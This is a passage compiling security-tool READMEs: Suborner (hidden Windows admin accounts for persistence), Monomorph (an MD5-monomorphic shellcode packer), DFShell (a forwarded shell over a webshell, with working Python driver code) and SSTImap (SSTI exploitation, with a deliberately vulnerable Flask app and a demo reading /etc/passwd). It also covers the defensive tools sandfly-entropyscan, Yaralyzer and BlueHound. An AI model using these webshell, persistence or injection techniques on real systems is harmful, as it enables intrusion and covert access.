    • No. This is a one-time assessment, we urge customers to leverage tooling like AWS SecurityHub for Ongoing assessments.
  3. Why does the CloudFormation service error when deleting the stack?
    • You must remove the objects (reports) out of the S3 bucket first
  4. Does this integrate with GuardDuty, Security Hub, CloudWatch, etc.?
    • Not at this time. In a future sprint we plan to incorporate integration with AWS services like Security Hub and GuardDuty. However, you can follow the instructions in this blog to integrate Prowler and Security Hub.
  5. How do I remediate the issues in the reports?
    • Generally, the issues should be described in the report with readily identifiable corrections. Please follow up with the public documentation for each tool (Prowler and ScoutSuite) as well. If this is insufficient, please reach out to your AWS Account team and we will be more than happy to help you understand the reports and work towards remediating issues.

Security

See CONTRIBUTING for more information.

License

This project is licensed under the Apache-2.0 License.



Suborner - The Invisible Account Forger


What's this?

A simple program to create a Windows account you will only know about :)

  • Create invisible local accounts without net user or Windows OS user management applications (e.g. netapi32::netuseradd)
  • Works on all Windows NT Machines (Windows XP to 11, Windows Server 2003 to 2022)
  • Impersonate through RID Hijacking any existing account (enabled or disabled) after a successful authentication

Create an invisible machine account with administrative privileges, and without invoking that annoying Windows Event Logger to report its creation!


Where can I see more?

Released at Black Hat USA 2022: Suborner: A Windows Bribery for Invisible Persistence

How can I use this?

Build

  • Make sure you have .NET 4.0 and Visual Studio 2019
  • Clone this repo: git clone https://github.com/r4wd3r/Suborner/
  • Open the .sln with Visual Studio
  • Build x86, x64 or both versions
  • Bribe Windows!

Release

Download the latest release and pwn!

Usage

Thanks!

This attack would not have been possible without the great research done by:

What's next?

Hack Suborn the planet!



Monomorph - MD5-Monomorphic Shellcode Packer - All Payloads Have The Same MD5 Hash

                                                
════════════════════════════════════╦═══
╔═╦═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╦═╗ ╔═╗ ╔══╔═╗ ╠═╗
═╩ ╩ ╩═╚═╝═╩ ╩═╚═╝═╩ ╩ ╩═╚═╝═╩ ╠═╝═╩ ╩═
════════════════════════════════╩═══════
By Retr0id

═══ MD5-Monomorphic Shellcode Packer ═══


USAGE: python3 monomorph.py input_file output_file [payload_file]

What does it do?

It packs up to 4KB of compressed shellcode into an executable binary, near-instantly. The output file will always have the same MD5 hash: 3cebbe60d91ce760409bbe513593e401

Currently, only Linux x86-64 is supported. It would be trivial to port this technique to other platforms, although each version would end up with a different MD5. It would also be possible to use a multi-platform polyglot file like APE.

Example usage:

$ python3 monomorph.py bin/monomorph.linux.x86-64.benign bin/monomorph.linux.x86-64.meterpreter sample_payloads/bin/linux.x64.meterpreter.bind_tcp.bin

Why?

People have previously used single collisions to toggle a binary between "good" and "evil" modes. Monomorph takes this concept to the next level.

Some people still insist on using MD5 to reference file samples, for various reasons that don't make sense to me. If any of these people end up investigating code packed using Monomorph, they're going to get very confused.

How does it work?

For every bit we want to encode, a colliding MD5 block has been pre-calculated using FastColl. As summarised here, each collision gives us a pair of blocks that we can swap out without changing the overall MD5 hash. The loader checks which block was chosen at runtime, to decode the bit.

To encode 4KB of data, we need to generate 4*1024*8 collisions (which takes a few hours), taking up 4MB of space in the final file.

To speed this up, I made some small tweaks to FastColl to make it even faster in practice, enabling it to be run in parallel. I'm sure there are smarter ways to parallelise it, but my naive approach is to start N instances simultaneously and wait for the first one to complete, then kill all the others.

Since I've already done the pre-computation, reconfiguring the payload can be done near-instantly. Swapping the state of the pre-computed blocks is done using a technique implemented by Ange Albertini.
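
Conceptually, the packing and loader-side decoding can be sketched in a few lines of Python; the collision pairs themselves are the precomputed FastColl outputs, and everything below is an illustration of the scheme rather than Monomorph's actual code:

BLOCK_LEN = 128  # a FastColl collision spans two 64-byte MD5 blocks

def pack_bits(bits, collision_pairs):
    # Pick one member of each precomputed colliding pair per payload bit;
    # either choice leaves the file's overall MD5 unchanged.
    return b"".join(pair[bit] for bit, pair in zip(bits, collision_pairs))

def unpack_bits(body, collision_pairs):
    # Loader-side decode: check which member of each pair is present.
    return [0 if body[i * BLOCK_LEN:(i + 1) * BLOCK_LEN] == pair[0] else 1
            for i, pair in enumerate(collision_pairs)]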

Is it detectable?

Yes. It's not very stealthy at all, nor does it try to be. You can detect the collision blocks using detectcoll.



Sandfly-Entropyscan - Tool To Detect Packed Or Encrypted Binaries Related To Malware, Finds Malicious Files And Linux Processes And Gives Output With Cryptographic Hashes


What is sandfly-entropyscan?

sandfly-entropyscan is a utility to quickly scan files or running processes and report on their entropy (measure of randomness) and if they are a Linux/Unix ELF type executable. Some malware for Linux is packed or encrypted and shows very high entropy. This tool can quickly find high entropy executable files and processes which often are malicious.


Features

  • Written in Golang and is portable across multiple architectures with no modifications.
  • Standalone binary requires no dependencies and can be used instantly without loading any libraries on suspect machines.
  • Not affected by LD_PRELOAD style rootkits that are cloaking files.
  • Built-in PID busting to find hidden/cloaked processes from certain types of Loadable Kernel Module (LKM) rootkits.
  • Generates entropy and also MD5, SHA1, SHA256 and SHA512 hash values of files.
  • Can be used in scanning scripts to find problems automatically.
  • Can be used by incident responders to quickly scan and zero in on potential malware on a Linux host.

Why Scan for Entropy?

Entropy is a measure of randomness. For binary data 0.0 is not-random and 8.0 is perfectly random. Good crypto looks like random white noise and will be near 8.0. Good compression removes redundant data making it appear more random than if it was uncompressed and usually will be 7.7 or above.

A lot of malware executables are packed to avoid detection and make reverse engineering harder. Most standard Linux binaries are not packed because they aren't trying to hide what they are. Searching for high entropy files is a good way to find programs that could be malicious just by having these two attributes of high entropy and executable.
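
The measure in question is Shannon entropy over byte values; a minimal Python equivalent of the calculation (sandfly-entropyscan itself is written in Go) might look like this:

import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    # Shannon entropy in bits per byte: 0.0 = constant data, 8.0 = uniform random.
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total)
                for n in Counter(data).values())

print(shannon_entropy(b"\x00" * 1024))         # 0.0: not random at all
print(shannon_entropy(bytes(range(256)) * 4))  # 8.0: perfectly uniform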

How Do I Use This?

Usage of sandfly-entropyscan:

-csv output results in CSV format (filename, path, entropy, elf_file [true|false], MD5, SHA1, SHA256, SHA512)

-delim change the default delimiter for CSV files of "," to one of your choosing ("|", etc.)

-dir string directory name to analyze

-file string full path to a single file to analyze

-proc check running processes (defaults to ELF only check)

-elf only check ELF executables

-entropy float show any file/process with entropy greater than or equal to this value (0.0 min - 8.0 max, defaults 0 to show all files)

-version show version and exit

Examples

Search for any file that is executable under /tmp:

sandfly-entropyscan -dir /tmp -elf

Search for high entropy (7.7 and higher) executables (often packed or encrypted) under /var/www:

sandfly-entropyscan -dir /var/www -elf -entropy 7.7

Generates entropy and cryptographic hashes of all running processes in CSV format:

sandfly-entropyscan -proc -csv

Search for any process with an entropy higher than 7.7 indicating it is likely packed or encrypted:

sandfly-entropyscan -proc -entropy 7.7

Generate entropy and cryptographic hash values of all files under /bin and output to CSV format (for instance to save and compare hashes):

sandfly-entropyscan -dir /bin -csv

Scan a directory for all files (ELF or not) with entropy greater than 7.7: (potentially large list of files that are compressed, png, jpg, object files, etc.)

sandfly-entropyscan -dir /path/to/dir -entropy 7.7

Quickly check a file and generate entropy, cryptographic hashes and show if it is executable:

sandfly-entropyscan -file /dev/shm/suspicious_file

Use Cases

Do spot checks on systems you think have a malware issue. Or you can automate the scan so you get an alert if something with high entropy shows up in a place you didn't expect. Or simply flag any executable ELF-type file that is somewhere strange (e.g. hanging out in /tmp or under a user's HTML directory). For instance:

Did a high entropy binary show up under the system /var/www directory? Could be someone put a malware dropper on your website:

sandfly-entropyscan -dir /var/www -elf -entropy 7.7

Set up a cron task to scan your /tmp, /var/tmp, and /dev/shm directories for any kind of executable file, whether it's high entropy or not. Executable files under tmp directories can frequently be a malware dropper.

sandfly-entropyscan -dir /tmp -elf

sandfly-entropyscan -dir /var/tmp -elf

sandfly-entropyscan -dir /dev/shm -elf

Set up another cron or automated security sweep to spot check your systems for highly compressed or encrypted binaries that are running:

sandfly-entropyscan -proc -entropy 7.7

Build

git clone https://github.com/sandflysecurity/sandfly-entropyscan.git

  • Go into the repo directory and build it:

go build

  • Run the binary with your options:

./sandfly-entropyscan

Build Scripts

There are some basic build scripts that build for various platforms. You can use these as-is, or modify them to suit. For incident responders, it might be useful to keep pre-compiled binaries ready to go on your investigation box.

build.sh - Build for current OS you're running on when you execute it.

ELF Detection

We use a simple method to see whether a file may be an executable ELF type, and we can spot ELF format files for multiple platforms. Even if malware ships Intel/AMD, MIPS and Arm dropper binaries, we will still be able to spot all of them.
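
The check boils down to the four-byte ELF magic at the start of the file; a Python equivalent of the idea:

def is_elf(path: str) -> bool:
    # ELF files start with 0x7f 'E' 'L' 'F' regardless of CPU architecture.
    with open(path, "rb") as f:
        return f.read(4) == b"\x7fELF"

print(is_elf("/bin/ls"))  # True on most Linux systems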

False Positives

It's possible to flag a legitimate binary that has high entropy because of how it was compiled, or because it was packed for legitimate reasons. Other files like .zip, .gz, .png, .jpg and such also have very high entropy because they are compressed formats. Compression removes redundancy in a file, which makes it appear more random and have higher entropy.

On Linux, you may find some kinds of libraries (.so files) get flagged if you scan library directories.

However, it is our experience that executable binaries that also have high entropy are often malicious. This is especially true if you find them in areas where executables normally shouldn't be (such as again tmp or html directories).

Performance

The entropy calculation requires reading in all the bytes of the file and tallying them up to get a final number. It can use a lot of CPU and disk I/O, especially on very large file systems or very large files. The program has an internal limit where it won't calculate entropy on any file over 2GB, nor will it try to calculate entropy on any file that is not a regular file type (e.g. won't try to calculate entropy on devices like /dev/zero).

Then we calculate MD5, SHA1, SHA256 and SHA512 hashes. Each of these requires going over the file as well. It's reasonably fast on modern systems, but if you are crawling a very large file system it can take some time to complete.

If you tell the program to only look at ELF files, then the entropy/hash calculations won't happen unless it is an ELF type and this will save a lot of time (e.g. it will ignore massive database files that aren't executable).

If you want to automate this program, it's best to not have it crawl the entire root file system unless you want that specifically. A targeted approach will be faster and more useful for spot checks. Also, use the ELF flag as that will drastically reduce search times by only processing executable file types.

Incident Response

For incident responders, running sandfly-entropyscan against the entire top-level "/" directory may be a good idea just to quickly get a list of likely packed candidates to investigate. This will spike CPU and disk I/O. However, you probably don't care at that point since the box has been mining cryptocurrency for 598 hours anyway by the time the admins noticed.

Again, use the ELF flag to get to the likely problem candidate executables and ignore the noise.

Testing

There is a script called scripts/testfiles.sh that will make two files: one full of random data and one not random at all. When you run the script, it will make the files and run sandfly-entropyscan in executable detection mode. You should see two files: one with very high entropy (at or near 8.0) and one full of non-random data that should be at 0.00 for low entropy. Example:

./testfiles.sh

Creating high entropy random executable-like file in current directory.

Creating low entropy executable-like file in current directory.

high.entropy.test, entropy: 8.00, elf: true

low.entropy.test, entropy: 0.00, elf: true

You can also load up the upx utility and compress an executable and see what values it returns.

Agentless Linux Security

Sandfly Security produces an agentless endpoint detection and incident response platform (EDR) for Linux. Automated entropy checks are just one of thousands of things we search for to find intruders without loading any software on your Linux endpoints.

Get a free license and learn more below:

https://www.sandflysecurity.com @SandflySecurity



DFShell - The Best Forwarded Shell


██████╗ ███████╗███████╗██╗  ██╗███████╗██╗     ██╗     
██╔══██╗██╔════╝██╔════╝██║ ██║███╔═══╝██║ ██║
██║ ██║█████╗ ███████╗███████║█████╗ ██║ ██║
██║ ██║██╔══╝ ╚════██║██╔══██║██╔══╝ ██║ ██║
██████╔╝██║ ███████║██║ ██║███████╗████████╗███████╗
╚═════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝

D3Ext's Forwarded Shell is a Python 3 script which uses mkfifo to simulate a shell on the victim machine. It creates a hidden directory in /dev/shm/.fs/ where the fifos are stored. You can even have a tty over a webshell.

In case you want a good webshell with code obfuscation, a login panel and more functions, you have this webshell (scripted by me); you can change the username and the password at the top of the file. It also has a little protection in case of being discovered: if the webshell is accessed from localhost, it returns a 404 status code.


Why you should use DFShell?

To use other forwarded shells you have to edit the script to change the URL and the parameter of the webshell, but DFShell uses parameters to quickly pass the arguments to the script (-u/--url and -p/--parameter). The script has pretty, colored output; you also get custom commands to upload and download files from the target and to do port and host discovery, and it deletes the files created on the victim if you press Ctrl + C or simply exit from the shell. A condensed sketch of the underlying technique follows.
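
Here is a minimal Python sketch of the mkfifo forwarded-shell idea over a webshell; the URL, parameter and fifo paths are illustrative assumptions, and this shows the general technique rather than DFShell's actual code:

import requests  # assumed: the webshell runs commands via a GET parameter

URL, PARAM = "http://10.10.10.10/webshell.php", "cmd"  # illustrative target
FIFO_DIR = "/dev/shm/.fs"

def run(cmd: str) -> str:
    return requests.get(URL, params={PARAM: cmd}, timeout=10).text

# One-time setup: a fifo feeds a persistent shell whose output lands in a file.
run(f"mkdir -p {FIFO_DIR}; mkfifo {FIFO_DIR}/input;"
    f" tail -f {FIFO_DIR}/input | /bin/sh > {FIFO_DIR}/output 2>&1 &")

while True:
    cmd = input("dfshell> ")
    run(f"echo '{cmd}' > {FIFO_DIR}/input")                      # feed the shell
    print(run(f"cat {FIFO_DIR}/output; : > {FIFO_DIR}/output"))  # read and clear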

*If you change the current user from the webshell (or anything gets unstable), execute: 'sh'*

Installation:

Install with pip

pip3 install dfshell

Install from source

git clone https://github.com/D3Ext/DFShell
cd DFShell
pip3 install -r requirements

One-liner

git clone https://github.com/D3Ext/DFShell && cd DFShell && pip3 install -r requirements

Usage:

It's simple: you pass the URL of the webshell and the parameter that executes commands. I recommend the simplest webshell.

python3 DFShell.py -u http://10.10.10.10/webshell.php -p cmd

Demo:



Yaralyzer - Visually Inspect And Force Decode YARA And Regex Matches Found In Both Binary And Text Data, With Colors


Visually inspect all of the regex matches (and their sexier, more cloak and dagger cousins, the YARA matches) found in binary data and/or text. See what happens when you force various character encodings upon those matched bytes. With colors.


Quick Start

pipx install yaralyzer

# Scan against YARA definitions in a file:
yaralyze --yara-rules /secret/vault/sigmunds_malware_rules.yara lacan_buys_the_dip.pdf

# Scan against an arbitrary regular expression:
yaralyze --regex-pattern 'good and evil.*of\s+\w+byte' the_crypto_archipelago.exe

# Scan against an arbitrary YARA hex pattern
yaralyze --hex-pattern 'd0 93 d0 a3 d0 [-] 9b d0 90 d0 93' one_day_in_the_life_of_ivan_cryptosovich.bin

What It Do

  1. See the actual bytes your YARA rules are matching. No more digging around copy/pasting the start positions reported by YARA into your favorite hex editor. Displays both the bytes matched by YARA as well as a configurable number of bytes before and after each match in hexadecimal and "raw" python string representation.
  2. Do the same for byte patterns and regular expressions without writing a YARA file. If you're too lazy to write a YARA file but are trying to determine, say, whether there's a regular expression hidden somewhere in the file you could scan for the pattern '/.+/' and immediately get a window into all the bytes in the file that live between front slashes. Same story for quotes, BOMs, etc. Any regex YARA can handle is supported so the sky is the limit.
  3. Detect the possible encodings of each set of matched bytes. The chardet library is a sophisticated library for guessing character encodings, and it is leveraged here (see the sketch after this list).
  4. Display the result of forcing various character encodings upon the matched areas. Several default character encodings will be forcibly attempted in the region around the match. chardet will also be leveraged to see if the bytes fit the pattern of any known encoding. If chardet is confident enough (configurable), an attempt at decoding the bytes using that encoding will be displayed.
  5. Export the matched regions/decodings to SVG, HTML, and colored text files. Show off your ASCII art.
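
Points 3 and 4 above boil down to calling chardet on the matched region; a minimal sketch of that detection step:

import chardet

# chardet guesses the encoding of a byte region and reports its confidence.
matched_bytes = "Один день Ивана Денисовича".encode("utf-8")
guess = chardet.detect(matched_bytes)
print(guess)  # e.g. {'encoding': 'utf-8', 'confidence': 0.99, ...}

# A decode is only attempted when the confidence clears a (configurable)
# threshold, along these lines:
if guess["encoding"] and guess["confidence"] > 0.7:
    print(matched_bytes.decode(guess["encoding"]))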

Why It Do

The Yaralyzer's functionality was extracted from The Pdfalyzer when it became apparent that visualizing and decoding pattern matches in binaries had more utility than just in a PDF analysis tool.

YARA, for those who are unaware, is branded as a malware analysis/alerting tool but it's actually both a lot more and a lot less than that. One way to think about it is that YARA is a regular expression matching engine on steroids. It can locate regex matches in binaries like any regex engine but it can also do far wilder things like combine regexes in logical groups, compare regexes against all 256 XORed versions of a binary, check for base64 and other encodings of the pattern, and more. Maybe most importantly of all YARA provides a standard text based format for people to share their 'roided regexes with the world. All these features are particularly useful when analyzing or reverse engineering malware, whose authors tend to invest a great deal of time into making stuff hard to find.

But... that's also all YARA does. Everything else is up to the user. YARA's just a match engine and if you don't know what to match (or even what character encoding you might be able to match in) it only gets you so far. I found myself a bit frustrated trying to use YARA to look at all the matches of a few critical patterns:

  1. Bytes between escaped quotes (\".+\" and \'.+\')
  2. Bytes between front slashes (/.+/). Front slashes demarcate a regular expression in many implementations and I was trying to see if any of the bytes matching this pattern were actually regexes.

YARA just tells you the byte position and the matched string but it can't tell you whether those bytes are UTF-8, UTF-16, Latin-1, etc. etc. (or none of the above). I also found myself wanting to understand what was going on in the region of the matched bytes and not just in the matched bytes. In other words I wanted to scope the bytes immediately before and after whatever got matched.

Enter The Yaralyzer, which lets you quickly scan the regions around matches while also showing you what those regions would look like if they were forced into various character encodings.

It's important to note that The Yaralyzer isn't a full on malware reversing tool. It can't do all the things a tool like CyberChef does and it doesn't try to. It's more intended to give you a quick visual overview of suspect regions in the binary so you can hone in on the areas you might want to inspect with a more serious tool like CyberChef.

Installation

Install it with pipx or pip3. pipx is a marginally better solution as it guarantees any packages installed with it will be isolated from the rest of your local python environment. Of course if you don't really have a local python environment this is a moot point and you can feel free to install with pip/pip3.

pipx install yaralyzer

Usage

Run yaralyze -h to see the command line options (screenshot below).

For info on exporting SVG images, HTML, etc., see Example Output.

Configuration

If you place a file called .yaralyzer in your home directory or the current working directory then environment variables specified in that .yaralyzer file will be added to the environment each time yaralyzer is invoked. This provides a mechanism for permanently configuring various command line options so you can avoid typing them over and over. See the example file .yaralyzer.example to see which options can be configured this way.

Only one .yaralyzer file will be loaded and the working directory's .yaralyzer takes precedence over the home directory's .yaralyzer.

As A Library

Yaralyzer is the main class. It has a variety of constructors supporting:

  1. Precompiled YARA rules
  2. Creating a YARA rule from a string
  3. Loading YARA rules from files
  4. Loading YARA rules from all .yara files in a directory
  5. Scanning bytes
  6. Scanning a file

Should you want to iterate over the BytesMatch (like a re.Match object for a YARA match) and BytesDecoder (tracks decoding attempt stats) objects returned by The Yaralyzer, you can do so like this:

from yaralyzer.yaralyzer import Yaralyzer

yaralyzer = Yaralyzer.for_rules_files(['/secret/rule.yara'], 'lacan_buys_the_dip.pdf')

for bytes_match, bytes_decoder in yaralyzer.match_iterator():
    do_stuff()

Example Output

The Yaralyzer can export visualizations to HTML, ANSI colored text, and SVG vector images using the file export functionality that comes with Rich. SVGs can be turned into png format images with a tool like Inkscape or cairosvg. In our experience they both work though we've seen some glitchiness with cairosvg.
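
If you want to script that conversion, cairosvg exposes it as a one-liner; a sketch (file names are placeholders):

import cairosvg  # pip install cairosvg

# Convert an exported Yaralyzer SVG into a PNG.
cairosvg.svg2png(url="yaralyzer_export.svg", write_to="yaralyzer_export.png")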

PyPi Users: If you are reading this document on PyPi be aware that it renders a lot better over on GitHub. Pretty pictures, footnotes that work, etc.

Raw YARA match result:

Display hex, raw python string, and various attempted decodings of both the match and the bytes before and after the match (configurable):

Bonus: see what chardet.detect() thinks about the likelihood your bytes are in a given encoding/language:

TODO

  • highlight decodes done at chardet's behest
  • deal with repetitive matches


SSTImap - Automatic SSTI Detection Tool With Interactive Interface

 

SSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.

This tool was developed to be used as an interactive penetration testing tool for SSTI detection and exploitation, which allows more advanced exploitation.

Sandbox break-out techniques came from:

This tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.


Differences with Tplmap

Even though this software is based on Tplmap's code, backwards compatibility is not provided.

  • Interactive mode (-i) allowing for easier exploitation and detection
  • Base language eval()-like shell (-x) or single command (-X) execution
  • Added new payload for Smarty without enabled {php}{/php}. Old payload is available as Smarty_unsecure.
  • User-Agent can be randomly selected from a list of desktop browser agents using -A
  • SSL verification can now be enabled using -V
  • Short versions added to all arguments
  • Some old command line arguments were changed, check -h for help
  • Code is changed to use newer python features
  • Burp Suite extension temporarily removed, as Jython doesn't support Python3

Server-Side Template Injection

This is an example of a simple website written in Python using the Flask framework and the Jinja2 template engine. It integrates the user-supplied variable name in an unsafe way, concatenating it into the template string before rendering.

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
    name = request.args.get('name', 'World')
    # SSTI VULNERABILITY:
    template = f"Hello, {name}!<br>\n" \
               "OS type: {{os}}"
    return render_template_string(template, os=os.name)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)

Not only does this way of using templates create an XSS vulnerability, it also allows the attacker to inject template code that will be executed on the server, leading to SSTI.

$ curl -g 'https://www.target.com/page?name=John'
Hello, John!<br>
OS type: posix
$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello, 49!<br>
OS type: posix

User-supplied input should be introduced in a safe way through rendering context:

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
    name = request.args.get('name', 'World')
    template = "Hello, {{name}}!<br>\n" \
               "OS type: {{os}}"
    return render_template_string(template, name=name, os=os.name)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)
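
The difference between the two versions is easy to reproduce directly in Jinja2; a minimal sketch:

from jinja2 import Template

name = "{{7*7}}"  # attacker-controlled input

# Unsafe: the input is concatenated into the template source, so the
# injected expression is evaluated by the engine.
print(Template(f"Hello, {name}!").render())             # Hello, 49!

# Safe: the input is passed through the rendering context and stays literal.
print(Template("Hello, {{name}}!").render(name=name))   # Hello, {{7*7}}!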

Predetermined mode

SSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in multiple different template engines.

After the exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulations.

To check the URL, you can use -u argument:

$ ./sstimap.py -u https://example.com/page?name=John

╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚═════════════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 1.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Rerun SSTImap providing one of the following options:
--os-shell Prompt for an interactive operating system shell
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bound to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files

Use --os-shell option to launch a pseudo-terminal on the target.

$ ./sstimap.py -u https://example.com/page?name=John --os-shell

╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚══════╩══════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 0.6#dev
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Run commands on the operating system.
posix-linux $ whoami
root
posix-linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

To get a full list of options, use --help argument.

Interactive mode

In interactive mode, commands are used to interact with SSTImap. To enter interactive mode, you can use the -i argument. All other arguments, except for the ones regarding exploitation payloads, will be used as initial values for settings.

Some commands are used to alter settings between test runs. To run a test, the target URL must be supplied via the initial -u argument or the url command. After that, you can use the run command to check the URL for SSTI.

If SSTI was found, commands can be used to start the exploitation. You get the same exploitation capabilities as in the predetermined mode, but you can use Ctrl+C to abort them without stopping the program.

Test results remain valid until the target URL is changed, so you can easily switch between exploitation methods without re-running the detection test every time.

To get a full list of interactive commands, use command help in interactive mode.

Supported template engines

SSTImap supports multiple template engines and eval()-like injections.

New payloads are welcome in PRs.

Engine                           Language
Mako                             Python
Jinja2                           Python
Python (code eval)               Python
Tornado                          Python
Nunjucks                         JavaScript
Pug                              JavaScript
doT                              JavaScript
Marko                            JavaScript
JavaScript (code eval)           JavaScript
Dust (<= dustjs-helpers@1.5.0)   JavaScript
EJS                              JavaScript
Ruby (code eval)                 Ruby
Slim                             Ruby
ERB                              Ruby
Smarty (unsecured)               PHP
Smarty (secured)                 PHP
PHP (code eval)                  PHP
Twig (<=1.19)                    PHP
Freemarker                       Java
Velocity                         Java
Twig (>1.19)                     PHP (no RCE, blind, code evaluation, file read or file write)
Dust (> dustjs-helpers@1.5.0)    JavaScript (no RCE, blind, code evaluation, file read or file write)

Burp Suite Plugin

Currently, Burp Suite only works with Jython as a way to execute python2. Python3 functionality is not provided.

Future plans

If you plan to contribute something big from this list, let me know, to avoid duplicating work already in progress by me or other contributors.

  • Make template and base language evaluation functionality more uniform
  • Add more payloads for different engines
  • Short arguments as interactive commands?
  • Automatic languages and engines import
  • Engine plugins as objects of Plugin class?
  • JSON/plaintext API modes for scripting integrations?
  • Argument to remove escape codes?
  • Spider/crawler automation
  • Better integration for Python scripts
  • More POST data types support
  • Payload processing scripts


BlueHound - Tool That Helps Blue Teams Pinpoint The Security Issues That Actually Matter


BlueHound is an open-source tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network.
It is a fork of NeoDash, reimagined to make it suitable for defensive security purposes.

To get started with BlueHound, check out our introductory video, blog post and Nodes22 conference talk.


BlueHound supports presenting your data as tables, graphs, bar charts, line charts, maps and more. It contains a Cypher editor to directly write the Cypher queries that populate the reports. You can save dashboards to your database, and share them with others.

Main Features

  1. Full Automation: The entire cycle of collection, analysis and reporting is basically done with a click of a button.
  2. Community Driven: BlueHound configuration can be exported and imported by others. Sharing of knowledge, best practices, collection methodologies and more is built into the tool itself.
  3. Easy Reporting: Creating customized reports can be done intuitively, without the need to write any code.
  4. Easy Customization: Any custom collection method can be added into BlueHound. Users can even add their own custom parameters or custom icons for their graphs.

Getting Started

ROST ISO

BlueHound can be used as part of the ROST image, which comes pre-configured with everything you need (BlueHound, Neo4j, BloodHound, and a sample dataset).
To load ROST, create a new virtual machine, and install it from the ISO like you would for a new Windows host.

BlueHound Binary

If you already have a Neo4j instance running, you can download a pre-compiled version of BlueHound from our release page. Just download the zip file suitable to your OS version, extract it, and run the binary.

Using BlueHound

  1. Connect to your Neo4j server
  2. Download SharpHound, ShotHound and the Vulnerability Scanner report parser
  3. Use the Data Import section to collect & import data into your Neo4j database.
  4. Once you have data loaded, you can use the Configurations tab to set up the basic information that is used by the queries (e.g. Domain Admins group, crown jewels servers).
  5. Finally, the Queries section can be used to prepare the reports.

BlueHound How-To

Data Collection

The Data Import Tools section can be used to collect data at the click of a button. By default, BlueHound comes preconfigured with SharpHound, ShotHound, and the Vulnerability Scanners script. Additional tools can be added for more data collection. To get started:

  1. Download the relevant tools using the globe icon
  2. Configure the tool path & arguments for each tool
  3. Run the tools

The built-in tools can be configured to automatically upload the results to your Neo4j instance.

Running & Viewing Queries

To get results for a chart, either use the Refresh icon to run a specific query, or use the Query Runner section to run queries in batches. The results will be cached even after closing BlueHound, and queries can be run again to get updated results.
Some charts have an Info icon which explains the query and/or provides links to additional information.

Adding & Editing Queries

You can edit the query for new and/or existing charts by using the Settings icon on the top right section of the chart. Here you can use any parameters configured with a Param Select chart, and any Edge Filtering string (see section below).

Edge Filtering

Using the Edge Filtering section, you can filter out specific relationship types for all queries that use the relevant string in their query. For example, ":FILTERED_EDGES" can be used to filter by all the selection filters (a sketch of how this kind of substitution works follows below).
You can also filter by a specific category (see the Info icon) or even define your own custom edge filters.
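
To illustrate the mechanism, here is a sketch of a placeholder substitution of this kind. The Cypher query, node labels and substituted relationship types are hypothetical examples for illustration, not BlueHound's built-in reports:

# Illustration only: a report query embeds the ":FILTERED_EDGES" string,
# and the edge filter swaps in the relationship types currently allowed.
query = (
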